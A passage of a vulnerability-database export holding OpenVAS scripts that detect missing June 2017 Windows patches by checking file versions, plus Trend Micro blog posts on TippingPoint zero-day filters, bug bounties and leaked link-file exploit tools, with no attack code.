;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:45:28", "description": "This host is missing a 
critical security\n update according to Microsoft KB4022725", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022725)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811167", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811167", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022725)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811167\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-8474\", \"CVE-2017-8524\", \"CVE-2017-8527\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-0282\",\n \"CVE-2017-0283\", \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8531\",\n \"CVE-2017-8532\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8533\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-8483\", \"CVE-2017-8484\", \"CVE-2017-8555\", \"CVE-2017-0292\",\n \"CVE-2017-0294\", \"CVE-2017-0295\", \"CVE-2017-8485\", \"CVE-2017-8489\",\n \"CVE-2017-0296\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\",\n \"CVE-2017-8491\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8492\",\n \"CVE-2017-8493\", \"CVE-2017-8498\", \"CVE-2017-8499\", \"CVE-2017-8504\",\n \"CVE-2017-8460\", \"CVE-2017-8462\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8520\", \"CVE-2017-8521\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8464\", \"CVE-2017-8465\", \"CVE-2017-8515\", \"CVE-2017-8517\",\n \"CVE-2017-8554\", \"CVE-2017-8575\", \"CVE-2017-8518\");\n script_bugtraq_id(98902, 98930, 98933, 98853, 98903, 98953, 98863, 98885, 98920,\n 
98854, 98845, 98819, 98820, 98914, 98856, 98857, 98821, 98824,\n 98922, 98923, 98862, 98858, 98826, 98932, 98954, 98955, 98929,\n 98835, 98859, 98847, 98956, 98836, 98837, 98904, 98860, 98865,\n 98839, 98840, 98867, 98869, 98884, 98901, 98870, 98850, 98886,\n 98883, 98892, 98887, 98900, 98848, 98849, 98925, 98926, 98928,\n 98818, 98843, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 13:30:05 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022725)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022725\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - The error with slow firewall operations that sometimes results in\n timeouts of Surface Hub's cleanup operation.\n\n - An issue with a race condition that prevents Cortana cross-device\n notification reply from working. 
Users will not be able to use the\n remote toast activation feature set.\n\n - An issue with the Privacy Separator feature of a Wireless Access Point\n does not block communication between wireless devices on local subnets.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code in the context of the current user,\n gain the same user rights as the current user and to take control of\n an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1703 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022725\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.412\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.15063.0 - 11.0.15063.412\\n' ;\n security_message(data:report);\n 
exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:48:08", "description": "This host is missing a critical security\n update according to Microsoft KB4022715", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022715)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310810903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810903", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities 
(KB4022715)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810903\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8524\", \"CVE-2017-0215\", \"CVE-2017-0216\", \"CVE-2017-0218\",\n \"CVE-2017-0219\", \"CVE-2017-0282\", \"CVE-2017-8475\", \"CVE-2017-8476\",\n \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0284\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\",\n \"CVE-2017-0294\", \"CVE-2017-0295\", \"CVE-2017-0296\", \"CVE-2017-8489\",\n \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\",\n \"CVE-2017-8492\", 
\"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8493\", \"CVE-2017-8494\", \"CVE-2017-8496\", \"CVE-2017-8497\",\n \"CVE-2017-8498\", \"CVE-2017-8504\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\", \"CVE-2017-8515\",\n \"CVE-2017-8517\", \"CVE-2017-0173\", \"CVE-2017-0193\", \"CVE-2017-8473\",\n \"CVE-2017-8474\", \"CVE-2017-8527\", \"CVE-2017-8554\", \"CVE-2017-8575\",\n \"CVE-2017-8576\", \"CVE-2017-8518\");\n script_bugtraq_id(98848, 98849, 98926, 98928, 98930, 98879, 98896, 98897, 98898,\n 98885, 98853, 98903, 98953, 98863, 98819, 98920, 98854, 98845,\n 98820, 98821, 98918, 98914, 98856, 98857, 98862, 98824, 98922,\n 98923, 98858, 98859, 98826, 98932, 98954, 98955, 98929, 98835,\n 98836, 98847, 98860, 98940, 98837, 98904, 98839, 98865, 98840,\n 98867, 98869, 98870, 98884, 98901, 98887, 98850, 98855, 98880,\n 98882, 98886, 98892, 98900, 98818, 98843, 98844, 98846, 98833,\n 98895, 98873, 98878, 98852, 98902, 98933);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 08:44:33 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022715)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022715\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - The way the Microsoft Edge JavaScript scripting engine handles objects\n in memory.\n\n - Windows kernel improperly initializes objects in memory.\n\n - Windows improperly handles objects 
in memory.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Secure Kernel Mode fails to properly handle objects in memory.\n\n - Microsoft Edge Fetch API incorrectly handles a filtered response type.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Microsoft scripting engines do not properly handle objects in memory.\n\n - Microsoft Edge improperly accesses objects in memory.\n\n For more information please check the Reference URL.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code in the context of the current user,\n obtain sensitive information to further compromise the user's system and to\n bypass security.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022715\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", 
test_version2:\"11.0.14393.1355\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.14393.0 - 11.0.14393.1355\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2017-07-11T00:19:10", "description": "\n\nIt has been quoted by Albert Einstein, Benjamin Franklin, and others that insanity is \u201cdoing the same thing over and over again and expecting different results.\u201d I could say that in our world of cyber security, despite all the headlines about data breaches and ransomware, there is no \u201cinsanity.\u201d Products we used 25 years ago probably can\u2019t protect against the latest malware. Someone will reverse-engineer someone\u2019s code and ultimately figure out how to evade a product\u2019s protection mechanisms for detecting or blocking an attack. Entire segments of the cyber security industry exist because there is no insanity. Those who create malware or tools that exploit bugs don\u2019t do the exact same thing over and over again. Once we\u2019ve figured them out, they adjust, and then we adjust by making our products smarter \u2013 until the cycle starts again.\n\nWhen Stuxnet hit in 2010, it made headlines as a new kind of attack with massive geopolitical consequences. Microsoft released several different security patches in response, including MS10-046, to address the vulnerability in link files. Now, with the WikiLeaks documents exposure, it appears that a tool called \u201cEZCheese\u201d exploited a similar bug in link files until 2015. That tool change resulted from a set of bugs discovered through the Zero Day Initiative program that showed the original MS10-046 patch had failed. 
This forced a change of operational tactics to what was then an \u201cunknown link file vulnerability\u201d in Microsoft, which was likely corrected with the release of CVE-2017-8464. According to the WikiLeaks released documents, both EZCheese and its successor Brutal Kangaroo were designed to attack air-gapped networks similar to Stuxnet. You can learn more on Brutal Kangaroo and the impact the Zero Day Initiative has had on the industry by reading Brian Gorenc\u2019s commentary on his blog: [The Real-World Impact of Bug Bounties and Vulnerability Research](<http://blog.trendmicro.com/real-world-impact-bug-bounties-vulnerability-research/>).\n\n**Zero-Day Filters**\n\nThere are 23 new zero-day filters covering six vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (3)_**\n\n| \n\n * 28916: ZDI-CAN-4887: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28917: ZDI-CAN-4895: Zero Day Initiative Vulnerability (Adobe Flash)\n * 28924: ZDI-CAN-4756: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Foxit (1)_**\n\n| \n\n * 28921: ZDI-CAN-4518: Zero Day Initiative Vulnerability (Foxit Reader)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (11)_**\n\n| \n\n * 28727: HTTPS: HPE Network Automation PermissionFilter Authentication Bypass Vulnerability (ZDI-17-332)\n * 28906: ZDI-CAN-4870: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28907: ZDI-CAN-4871: Zero Day Initiative Vulnerability 
(Hewlett Packard Enterprise Intelligent Management)\n * 28908: ZDI-CAN-4872: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28909: ZDI-CAN-4873: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28910: ZDI-CAN-4874: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28911: ZDI-CAN-4875: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28912: ZDI-CAN-4876: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28913: ZDI-CAN-4877: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28914: ZDI-CAN-4878: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28915: ZDI-CAN-4880: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)**_ _** \n---|--- \n| \n \n**_Microsoft (6)_**\n\n| \n\n * 28897: ZDI-CAN-4777: Zero Day Initiative Vulnerability (Microsoft Edge)\n * 28918: ZDI-CAN-4886: Zero Day Initiative Vulnerability (Microsoft Chakra)\n * 28919: ZDI-CAN-4888: Zero Day Initiative Vulnerability (Microsoft Edge)\n * 28925: ZDI-CAN-4894: Zero Day Initiative Vulnerability (Microsoft Chakra)\n * 28981: ZDI-CAN-4910: Zero Day Initiative Vulnerability (Microsoft Chakra)\n * 28982: ZDI-CAN-4884: Zero Day Initiative Vulnerability (Microsoft Edge)**_ _** \n---|--- \n| \n \n**_Schneider Electric (1)_**\n\n| \n\n * 28920: HTTP: Schneider Electric U.motion Builder loadtemplate.php SQL Injection Vulnerability (ZDI-17-374)**_ _** \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 28900: HTTPS: Trend Micro InterScan Web Security delete_pac_files Command Injection (ZDI-17-229)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly 
recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-26-2017/>).", "cvss3": {}, "published": "2017-07-07T15:45:09", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of July 3, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-07-07T15:45:09", "id": "TRENDMICROBLOG:6AD718FC3C384CF6470A9D6815A565D3", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-3-2017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-06T18:18:08", "description": "\n\nRunning the world\u2019s largest vendor agnostic bug bounty program has afforded us the unique opportunity to purchase bugs of all varieties. The submissions to the Zero Day Initiative (ZDI) program range in severity from slightly annoying to hugely impactful. We wouldn\u2019t have it any other way. Generally speaking, the goal of a bug bounty program is to acquire as many bugs as possible. What happens with the bugs once acquired changes depending on the bounty program. At the ZDI, we work not just to kill bugs, which is something we do at a higher rate than other [organizations](<http://newsroom.trendmicro.com/press-release/awards/trend-micro-zero-day-initiative-recognized-leading-vulnerability-research-organ>), but we also aim to disrupt the use of exploits used in advanced attacks.\n\nOf course, detecting and defending against advanced persistent threats provides its own challenges. It\u2019s rare that real-world scenarios are laid bare without a time of crisis response. Recently, the WikiLeaks dump of tools reportedly used by U.S. government agencies offered a prime example of the ZDI program altering attack methods. 
In fact, if the data provided by WikiLeaks is to be believed, the Central Intelligence Agency was forced to change their operational toolset for exploiting targets based on actions taken by the ZDI.\n\nIn 2010, the world was introduced to the Stuxnet virus after it caused substantial damage to centrifuges in the Iranian nuclear program. At its core, Stuxnet had three parts: a rootkit to hide itself, a worm to execute the main payload of its attack, and a link file that automatically executed to spread copies of the worm. Microsoft released several different security patches in response, including [MS10-046](<https://technet.microsoft.com/en-us/library/security/ms10-046.aspx>), to address the vulnerability in link files. The patch enabled a whitelist check to ensure only approved files could be used, and many thought the implementation succeeded. However, according to the documents published on WikiLeaks, a tool called \u201cEZCheese\u201d exploited a similar bug in link files until 2015. That change resulted from a set of bugs coming through the [ZDI program](<http://www.zerodayinitiative.com/advisories/ZDI-15-086/>) that showed the MS10-046 patch had [failed](<https://community.saas.hpe.com/t5/Security-Research/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/251257#.WVQScdPytgc>). This forced a change of operational tactics to what was then an \u201cunknown link file vulnerability (Lachesis/RiverJack) related to the library-ms functionality of the operating system.\u201d Although not explicitly stated by Microsoft, this other link file bug was likely corrected with the release of [CVE-2017-8464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>).\n\nAccording to the released documents, both EZCheese and its successor Brutal Kangaroo were designed to attack air-gapped networks similar to Stuxnet. 
What some may not realize is that the link file could also be hosted on a remote drive viewable by the target.\n\nWhen the ZDI acquires a bug, it isn\u2019t just reported to the vendor for remediation. Information about the bug is provided to Digital Vaccine\u00ae Labs (DVLabs) within Trend Micro. They produce a DV filter for the vulnerability that allows TippingPoint customers to protect themselves while the vendor develops a patch for broader release. And yes, after deploying this filter (Digital Vaccine Filter 19340), hits were seen in Europe, South America, and Singapore. While it\u2019s impossible to know the intent or full circumstances surrounding these filters being triggered, the low quantity indicates these were likely targeted attacks.\n\nEarlier dumps from ShadowBrokers show this isn\u2019t the first case of this happening. The vulnerability used by the exploit referred to as \u201cEwok Frenzy\u201d was submitted to the ZDI program back in [2007](<http://www.zerodayinitiative.com/advisories/ZDI-07-011/>). Even though a patch was made available for the exploit, it was reportedly used for almost a decade after our initial disclosure. Bug bounties show their value when they successfully kill vulnerabilities. Without a doubt, the ZDI program kills bugs. In fact, we\u2019ve released 452 advisories this year (as of July 5) with 413 more in our upcoming queue. Each one represents a bug exposed to the light. In some cases, the exploit techniques required to exploit a bug can also be filtered. For example, another vulnerability listed in the documents, EasyBee, worked in the same manner as Ewok Frenzy, so the implemented DV filter covered both attacks.\n\nYou can question the veracity of these dumps or whether these exploits were ever actually in the wild, but the scramble by vendors to produce patches has been undeniable. The dumps show adversaries have a complexity and sophistication that requires constant vigilance from network defenders. 
It also shows how dedicated vulnerability research combined with a world-class bug bounty program increases security for everyone by changing the attack surface. While it\u2019s true there is a difference between zero-day vulnerabilities and zero-day attacks, the value of having protection against bugs prior to their disclosure can\u2019t be measured. The number of software bugs disclosed globally continues to increase year after year. The Zero Day Initiative will continue acquiring and researching zero-day vulnerabilities and working with vendors to increase the overall security posture of their products. We might not ever eliminate all government sponsored, marsupial-based exploits, but we sure can make it harder on them.", "cvss3": {}, "published": "2017-07-06T16:31:43", "title": "The Real-World Impact of Bug Bounties and Vulnerability Research", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2015-0096"], "modified": "2017-07-06T16:31:43", "id": "TRENDMICROBLOG:69233FAF477D3FFBB70EAF6FDC954DB3", "href": "http://blog.trendmicro.com/real-world-impact-bug-bounties-vulnerability-research/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-15T11:18:24", "description": "\n\nBefore the world of laptops, tablets and smart phones, some of us had to use paper-based solutions to keep track of our calendars and to-do lists. I used a Franklin Planner, where I kept track of my calendar as well as my never-ending to-do list. The Franklin Planner used the \u201cABC\u201d system to help you prioritize your tasks. 
If you use Microsoft Outlook, you can see this same approach in the Tasks section where you can assign your items with a high, normal, or low priority.\n\nIf you have a large number of tasks on your plate, it\u2019s a nice and easy way to prioritize what you need to work on first.\n\nNow imagine using a Franklin planner to prioritize thousands of security events in your network every 30 seconds? It\u2019s inconceivable! Even if you have an arsenal of security tools at your disposal, how do you determine what to focus on first? To help our customers make sense of what\u2019s going on in their network, we recently announced [SMS Threat Insights](<https://www.trendmicro.com/content/dam/trendmicro/global/en/business/products/network/integrated-atp/security-management-system/SB01_Threat_Insights_2017.pdf>), a new feature in our TippingPoint Security Management System (SMS). SMS Threat Insights aggregates threat data from multiple sources and compiles it to help you prioritize security response measures, increase visibility into current and potential threats impacting your network, and provide insight into preemptive protection actions that may have already been taken. You can learn more about SMS Threat Insights from my blog: [Not All Threats Are Created Equal](<http://blog.trendmicro.com/not-threats-created-equal/>). If you want to see SMS Threat Insights in action, get a quick demo [here](<https://www.youtube.com/watch?v=gc4K2JFS86E&t=12s>).\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before July 11, 2017. Microsoft released patches for Windows, Internet Explorer, Edge, Office, SharePoint, .NET Framework, Exchange, and HoloLens. A total of 19 of these CVEs are rated Critical. The following table maps Digital Vaccine filters to the Microsoft updates. 
You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [July 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/7/11/the-july-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0170 | | No Vendor Intelligence Provided \nCVE-2017-0243 | 29051 | \nCVE-2017-8463 | | No Vendor Intelligence Provided \nCVE-2017-8467 | | No Vendor Intelligence Provided \nCVE-2017-8486 | | No Vendor Intelligence Provided \nCVE-2017-8495 | | No Vendor Intelligence Provided \nCVE-2017-8501 | | No Vendor Intelligence Provided \nCVE-2017-8502 | | No Vendor Intelligence Provided \nCVE-2017-8556 | | No Vendor Intelligence Provided \nCVE-2017-8557 | | No Vendor Intelligence Provided \nCVE-2017-8559 | | No Vendor Intelligence Provided \nCVE-2017-8560 | | No Vendor Intelligence Provided \nCVE-2017-8561 | | No Vendor Intelligence Provided \nCVE-2017-8562 | | No Vendor Intelligence Provided \nCVE-2017-8563 | | No Vendor Intelligence Provided \nCVE-2017-8564 | | No Vendor Intelligence Provided \nCVE-2017-8565 | | No Vendor Intelligence Provided \nCVE-2017-8566 | | No Vendor Intelligence Provided \nCVE-2017-8569 | | No Vendor Intelligence Provided \nCVE-2017-8570 | | No Vendor Intelligence Provided \nCVE-2017-8573 | | No Vendor Intelligence Provided \nCVE-2017-8574 